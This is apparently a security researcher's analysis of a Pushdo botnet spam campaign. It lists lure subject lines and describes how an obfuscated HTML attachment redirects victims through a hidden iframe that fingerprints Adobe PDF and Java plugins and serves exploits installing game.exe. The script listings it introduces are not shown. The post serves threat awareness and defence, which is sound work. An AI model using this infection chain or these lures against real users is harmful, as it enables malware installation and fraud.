Over the last couple of days we have been seeing numerous malicious and Canadian Pharmacy spam campaigns sent from the Pushdo botnet. This campaign features an HTML file as an attachment and some subject lines, including one that mentions the FIFA World Cup, that may fool unwary recipients. Some of the email subjects we have seen are:
FIFA World Cup South Africa… bad news
[Recipient Domain] account Information
[Random Email Address] has sent you a birthday ecard.
Reset your Twitter password
The HTML file attachment contains the following JavaScript:
We have seen several different variations of this script but all have the same purpose which is concealed by some very basic obfuscation. If we remove the parts of this script that aren’t doing anything and clean up some of the text we get the script below:
If this attachment was opened in a browser with JavaScript enabled then the script will redirect the browser to the file z.htm (shown below) on one of several different web servers.
This page waits for three seconds and then redirects the browser to a Canadian Pharmacy website. While waiting, a hidden IFrame is loaded. We have removed some of the obfuscation to make the script in this IFrame more readable:
This script checks each of the browser’s plugins to see if any contain the words ‘Adobe Acrobat’ or ‘Adobe PDF’ in their name. This is looking for any Adobe PDF readers and if one is found, adds an IFrame to the page pointing to a malicious PDF file.
The script then checks if Java (Thats Sun Microsystem's Java, not JavaScript) is enabled, and if so, adds an IFrame that exploits vulnerabilities in Java.
The exploits install an executable named game.exe which we have not yet analyzed and is not detected by many anti virus products.
